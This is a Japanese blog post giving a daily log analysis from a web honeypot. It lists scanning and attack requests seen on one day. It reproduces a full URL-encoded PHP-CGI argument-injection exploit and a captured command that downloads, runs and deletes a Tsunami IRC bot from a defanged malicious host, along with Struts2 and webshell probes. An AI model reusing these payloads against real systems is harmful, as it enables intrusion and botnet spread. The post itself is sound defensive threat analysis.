WOWhoneypotの2018/7/1(日)（運用28日目）の簡易分析です。

本日の総アクセス件数は106件です。

44 [2018-07-01 "GET /
5 [2018-07-01 "HEAD /
2 [2018-07-01 "GET /web/phpMyAdmin/index.php
2 [2018-07-01 "GET /pmd/index.php
2 [2018-07-01 "GET /pmamy/index.php
2 [2018-07-01 "GET /pmamy2/index.php
2 [2018-07-01 "GET /PMA/index.php
2 [2018-07-01 "GET /pma/index.php
2 [2018-07-01 "GET /PMA2/index.php
2 [2018-07-01 "GET /phpMyAdmin/index.php
2 [2018-07-01 "GET /phpmyadmin/index.php
2 [2018-07-01 "GET /mysql/index.php
2 [2018-07-01 "GET /mysqladmin/index.php
2 [2018-07-01 "GET /index.php
2 [2018-07-01 "GET /db/index.php
2 [2018-07-01 "GET /dbadmin/index.php
2 [2018-07-01 "GET /admin/pma/index.php
2 [2018-07-01 "GET /admin/phpMyAdmin/index.php
2 [2018-07-01 "GET /admin/phpmyadmin/index.php
2 [2018-07-01 "GET /admin/mysql/index.php
2 [2018-07-01 "GET /admin/index.php
1 [2018-07-01 "PROPFIND /
1 [2018-07-01 "POST /xx.php
1 [2018-07-01 "POST /xw.php
1 [2018-07-01 "POST /wuwu11.php
1 [2018-07-01 "POST /w.php
1 [2018-07-01 "POST /wc.php
1 [2018-07-01 "POST /s.php
1 [2018-07-01 "POST /sheep.php
1 [2018-07-01 "POST /db_session.init.php
1 [2018-07-01 "POST /db.init.php
1 [2018-07-01 "POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E
1 [2018-07-01 "OPTIONS /
1 [2018-07-01 "GET /x
1 [2018-07-01 "GET /webdav/
1 [2018-07-01 "GET /mysql-admin/index.php
1 [2018-07-01 "GET /manager/html
1 [2018-07-01 "GET /index.action
1 [2018-07-01 "GET /admin/phpmyadmin2/index.php
1 [2018-07-01 "GET /admin/mysql2/index.php

いつものようにPhpMyAdmin関連と/を除外します。

1 [2018-07-01 "POST /xx.php
1 [2018-07-01 "POST /xw.php
1 [2018-07-01 "POST /wuwu11.php
1 [2018-07-01 "POST /w.php
1 [2018-07-01 "POST /wc.php
1 [2018-07-01 "POST /s.php
1 [2018-07-01 "POST /sheep.php
1 [2018-07-01 "POST /db_session.init.php
1 [2018-07-01 "POST /db.init.php
1 [2018-07-01 "POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E
1 [2018-07-01 "GET /x
1 [2018-07-01 "GET /webdav/
1 [2018-07-01 "GET /manager/html
1 [2018-07-01 "GET /index.action

全て見覚えのあるものばかりですね。（見覚えがあっても意図が分かるとは言っていない）

PHPの脆弱性をつく（？）もの。

POST /xx.php
POST /xw.php
POST /wuwu11.php
POST /w.php
POST /wc.php
POST /s.php
POST /sheep.php
POST /db_session.init.php
POST /db.init.php

Apache Magica攻撃。
取得するマルウェアは以下によるとperlShellで作成されたIRCを利用するBotのTsunamiであり、そのBotnetの拡大を狙ったものと推測されます。
https://www.virustotal.com/#/file/77ba21a304cf7ef8fef09eb5bc99adda789805b49e6a5c027ca6b2e4f28f41b3/detection
fetchコマンドもあるためBSD系OSも対象にしているようです。（ハニポ技術交流会で学んだ）

POST //%63%67%69%2D%62%69%6E/%70%68%70?（以下省略）
"cd /tmp ; wget hxxp://mafiagalati[.]hi2.ro/unix ; curl -O hxxp://mafiagalati[.]hi2.ro/unix ; fetch hxxp://mafiagalati.hi2[.]ro/unix ; chmod +x unix ; ./unix ; rm -rf unix

iOSの脱獄アプリのリポジトリ名と同じUser-Agentのアクセスですが詳細は不明です。

GET /x
User-Agent: Telesphoreo

WebDAVの調査行為

GET /webdav/

Tomcatの管理ページの調査行為

GET /manager/html

Apache Struts2の脆弱性をついた調査攻撃。コマンドはwhoamiでした。

GET /index.action

本日はMirai亜種Shinoaの攻撃はなかったようです。爆発的に広まるかと思いましたが、落ち着いたようです。

本日のハンティングログは以下です。Apache Magicaの1行を3つとしてカウントしてしまっていますので、直したいところですね。

1 [2018-07-01 wget hxxp://mafiagalati.hi2[.]ro/unix ; curl -O hxxp://mafiagalati.hi2[.]ro/unix ; fetch hxxp://mafiagalati.hi2[.]ro/unix
1 [2018-07-01 fetch hxxp://mafiagalati.hi2[.]ro/unix
1 [2018-07-01 curl -O hxxp://mafiagalati.hi2[.]ro/unix ; fetch hxxp://mafiagalati.hi2[.]ro/unix

以上です。